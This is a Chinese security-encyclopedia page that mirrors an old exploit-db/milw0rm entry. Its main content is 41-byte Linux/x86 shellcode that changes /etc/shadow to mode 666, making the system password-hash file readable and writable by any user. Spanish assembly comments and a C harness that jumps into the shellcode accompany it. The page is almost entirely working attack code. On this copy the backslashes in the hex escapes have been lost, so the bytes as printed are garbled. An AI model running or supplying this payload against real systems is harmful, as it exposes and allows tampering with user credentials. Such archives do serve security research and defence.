Linux/x86 – chmod 666 /etc/shadow Shellcode (41 bytes)

Linux/x86 – chmod 666 /etc/shadow Shellcode (41 bytes)

漏洞ID 1054660 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-Linux/x86 – chmod 666 /etc/shadow Shellcode (41 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – chmod 666 /etc/shadow Shellcode (41 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13437
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * [email protected]
 * 0x04abril0x7d2
 * 
 * int sys_chmod(const char * filename, mode_t mode)
 * {...}
 * 
 * Utilizando la interrupcion 15(chmod), asignando el octal 0666
 * al archivo deseado. En este caso /etc/shadow
 * 
 * Hice unas modificaciones en el codigo y solo pude reducir la shellcode en 1.
 * por el codigo mailme.
 *	"x31xdbx68x64x6fx77x53x68x2fx73x68x61x68x2fx65"
 *	"x74x63x89xe3x31xc9x88x4cx24x0bx66xb9xb6x01x31"
 *	"xc0xb0x0fxcdx80x31xc0x40xcdx80";
 *
*/

#include <stdio.h>

// Shellcode			//	Asm Code		// Main Interval
char shellcode[]=
"xebx17"			//	jmp     0x17		[3 ; 4]
"x5e"				//	popl    %esia		[5]
"x31xc9"			//	xorl    %ecx, %ecx	[6 ; 7]
"x88x4ex0b"			//      movb    %ecx, 0xb(%esi)	[8; 10]
"x8dx1e"			//	leal    (%esi), %ebx	[11;12]
"x66xb9xb6x01"		//	movw    $0x1b6, %cx     // asigno a cx el equivalente en hex al octal 0666
"x31xc0"			//	xorl    %eax, %eax	[17;18]
"xb0x0f"			//      movb    $0xf, %al       // Interrupcion 15 (chmod)
"xcdx80"			//      int     $0x80		[21;22]
"x31xc0"			//	xorl    %eax, %eax      // salida
"x40"				//	inc     %eax		[25]
"xcdx80"			//      int     $0x80		[26;27]
"xe8xe4xffxffxff"		//      call    -0x1c
"/etc/shadow";

main() {
	int *ret;
	ret=(int *)&ret+2;
	printf("Shellcode lenght=%dn",strlen(shellcode));
	(*ret) = (int)shellcode;
}

// milw0rm.com [2004-09-26]

相关推荐: Microsoft Windows NT 安全漏洞

Microsoft Windows NT 安全漏洞 漏洞ID 1207211 漏洞类型 Input Validation Error 发布时间 1999-01-01 更新时间 1999-01-01 CVE编号 CVE-1999-0549 CNNVD-ID CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享